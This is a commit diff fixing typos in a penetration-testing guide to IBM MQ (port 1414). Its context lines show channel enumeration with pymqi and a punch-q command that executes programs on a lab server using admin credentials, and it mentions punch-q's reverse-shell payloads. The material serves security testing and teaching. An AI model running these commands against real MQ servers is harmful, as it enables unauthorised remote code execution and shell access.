Update 1414-pentesting-ibmmq.md (typos)
This commit is contained in:
parent
30cbf6ebc7
commit
fe88ec40e7
|
@ -102,7 +102,7 @@ It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so
|
||||||
|
|
||||||
As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels.
|
As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels.
|
||||||
|
|
||||||
The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from *pymqi*:
|
The enumeration can basically be done with this code snippet `code/examples/dis_channels.py` from **pymqi**:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
import logging
|
import logging
|
||||||
|
@ -222,7 +222,7 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d
|
||||||
>
|
>
|
||||||
> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.*
|
> *Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here.*
|
||||||
|
|
||||||
The service creation / deletion with PCF for remote program execution is can be done by **punch-q**:
|
The service creation / deletion with PCF for remote program execution can be done by **punch-q**:
|
||||||
|
|
||||||
**Example 1**
|
**Example 1**
|
||||||
|
|
||||||
|
@ -240,7 +240,7 @@ You can also enumerate existing programs on the machine (here `/bin/doesnotexist
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
|
||||||
s "-c id"
|
s "whatever"
|
||||||
Command: /bin/doesnotexist
|
Command: /bin/doesnotexist
|
||||||
Arguments: -c id
|
Arguments: -c id
|
||||||
Service Name: 6e3ef5af652b4436
|
Service Name: 6e3ef5af652b4436
|
||||||
|
@ -262,7 +262,7 @@ For easy reverse shell, **punch-q** proposes also two reverse shell payloads :
|
||||||
* One with bash
|
* One with bash
|
||||||
* One with perl
|
* One with perl
|
||||||
|
|
||||||
*Of course you can build a custom one with the `execute`.*
|
*Of course you can build a custom one with the `execute` command.*
|
||||||
|
|
||||||
For bash:
|
For bash:
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue